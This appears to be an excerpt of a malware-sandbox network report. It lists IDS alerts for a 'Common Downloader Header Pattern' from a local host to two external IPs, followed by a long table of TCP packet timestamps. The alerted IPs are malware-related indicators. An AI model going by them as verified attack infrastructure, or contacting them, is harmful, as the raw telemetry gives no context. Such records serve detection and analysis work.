2024-12-16T16:33:27.235984+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49800 | 193.122.6.168 | 80 | TCP
2024-12-16T16:33:30.173513+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49800 | 193.122.6.168 | 80 | TCP
2024-12-16T16:33:31.824733+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49812 | 104.21.67.152 | 443 | TCP
2024-12-16T16:33:33.267532+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49818 | 193.122.6.168 | 80 | TCP
2024-12-16T16:33:38.136504+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49831 | 104.21.67.152 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 16:33:16.693512917 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:16.693587065 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:16.693701982 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:16.704690933 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:16.704722881 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:18.410638094 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:18.410752058 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:18.411727905 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:18.411806107 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:18.463960886 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:18.464015007 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:18.464896917 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:18.464987040 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:18.468720913 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:18.511383057 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:19.318170071 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:19.318260908 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:19.318299055 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:19.318350077 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:19.318356991 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:19.318408966 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:19.318536997 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:19.318553925 CET | 443 | 49778 | 172.217.19.174 | 192.168.2.4
Dec 16, 2024 16:33:19.318568945 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:19.318605900 CET | 49778 | 443 | 192.168.2.4 | 172.217.19.174
Dec 16, 2024 16:33:19.476660013 CET | 49784 | 443 | 192.168.2.4 | 142.250.181.97
Dec 16, 2024 16:33:19.476702929 CET | 443 | 49784 | 142.250.181.97 | 192.168.2.4
Dec 16, 2024 16:33:19.476808071 CET | 49784 | 443 | 192.168.2.4 | 142.250.181.97
Dec 16, 2024 16:33:19.477196932 CET | 49784 | 443 | 192.168.2.4 | 142.250.181.97
Dec 16, 2024 16:33:19.477210999 CET | 443 | 49784 | 142.250.181.97 | 192.168.2.4
Dec 16, 2024 16:33:21.189743996 CET | 443 | 49784 | 142.250.181.97 | 192.168.2.4
Dec 16, 2024 16:33:21.189897060 CET | 49784 | 443 | 192.168.2.4 | 142.250.181.97
Dec 16, 2024 16:33:21.197345018 CET | 49784 | 443 | 192.168.2.4 | 142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:21.197365999 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:21.197771072 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:21.197859049 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:21.198513985 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:21.243338108 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.216475964 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.216713905 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.229384899 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.229494095 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.336620092 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.336850882 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.336894035 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.336954117 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.340584993 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.341890097 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.408124924 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.408212900 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.412084103 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.413079023 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.413096905 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.413216114 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.417983055 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.418071032 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.426759958 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.426812887 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.435237885 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.435293913 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.439208984 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.439269066 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.440473080 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.440538883 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.448527098 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.448581934 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.453855991 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.453943014 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.457948923 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.458009958 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.466146946 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.466201067 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.468449116 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.468498945 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.478841066 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.478949070 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.481559038 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.481615067 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.492140055 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.492223024 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.495301008 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.495367050 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.505773067 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.505852938 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.508840084 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.508908987 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.519419909 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.519481897 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.522393942 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.522449017 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.532895088 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.532960892 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.533015013 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.533066988 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.547740936 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.547794104 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.568098068 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.568145990 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.568173885 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.568214893 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.599823952 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.599877119 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.599906921 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.599952936 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.602171898 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.602216959 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.606741905 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.606786013 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.606834888 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.606878042 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.610845089 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.610887051 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.610894918 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.610956907 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.621804953 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.621850967 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.621918917 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.621958971 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.621965885 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.622003078 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.631961107 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.632008076 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.632072926 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.632112980 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.643742085 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.643785000 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.643861055 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.643904924 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.653593063 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.653716087 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.653724909 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.653774977 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.662961006 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.663022041 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.663077116 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.663136959 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.673309088 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.673367977 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.673494101 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.673547983 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.683155060 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.683208942 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.683383942 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.683430910 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.693357944 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.693423986 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.693447113 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.693487883 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.703682899 CET44349784142.250.181.97192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 16, 2024 16:33:24.703737974 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.703767061 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.703833103 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.713316917 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.713366985 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.713469982 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.713515997 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.722199917 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.722251892 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.722398043 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.722445011 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.731435061 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.731484890 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.731497049 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.731564999 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.739888906 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.739955902 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.739969015 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.740020990 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.741234064 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.741312027 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.748325109 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.748380899 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.749597073 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.749653101 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.757216930 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.757296085 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.758076906 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.758133888 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.767241001 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.767345905 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.768644094 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.768702030 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.770633936 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.770685911 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.772120953 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.772166014 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.776731968 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.776783943 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.778053045 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.778107882 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.782815933 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.782866001 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.784037113 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.784097910 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.789402962 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.789460897 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.793410063 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.793472052 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.797938108 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.798002958 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.799154043 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.799221039 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.803102970 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.804126024 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.804439068 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.804498911 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.808223963 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.808288097 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.809614897 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.809674025 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.813381910 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.813447952 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.814639091 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.814706087 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.818454027 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.818509102 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.818536043 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.818593025 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.823790073 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.823873997 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.824436903 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.824503899 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.828959942 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.829054117 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.829067945 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.829124928 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.834312916 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.834398985 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.834460020 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.834652901 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.840881109 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.840966940 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.840980053 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.841044903 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.847626925 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.847721100 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.847733021 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.847812891 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.850019932 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.850104094 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.850162983 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.850220919 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.854101896 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.854202032 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.854224920 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.854286909 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.858462095 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.858578920 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.858616114 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.858673096 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.862715006 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.862811089 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.862832069 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.862895012 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.867089033 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.867177010 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.867196083 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.867257118 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.871448040 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.871527910 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.871532917 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.871578932 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.875499964 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.875582933 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.876153946 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.876215935 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.880125999 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.880196095 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.880237103 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.880287886 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.886817932 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.886908054 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.886931896 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.886987925 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.889811039 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.889890909 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.889947891 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.890005112 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.895565987 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.895679951 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.895725012 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.895788908 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.898919106 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.898989916 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.899033070 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.899084091 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.904721022 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.904782057 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.904851913 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.904901981 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.908058882 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.908119917 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.908194065 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.908243895 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.914155960 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.914272070 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.914288998 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.914346933 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.917195082 CET  443          49784      142.250.181.97   192.168.2.4
Dec 16, 2024 16:33:24.917263985 CET  49784        443        192.168.2.4      142.250.181.97
Dec 16, 2024 16:33:24.917278051 CET  443          49784      142.250.181.97   192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.917339087 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.923283100 CET44349784142.250.181.97192.168.2.4
                                                                                                                                                                          Dec 16, 2024 16:33:24.923386097 CET49784443192.168.2.4142.250.181.97
                                                                                                                                                                          Dec 16, 2024 16:33:24.923398018 CET44349784142.250.181.97192.168.2.4
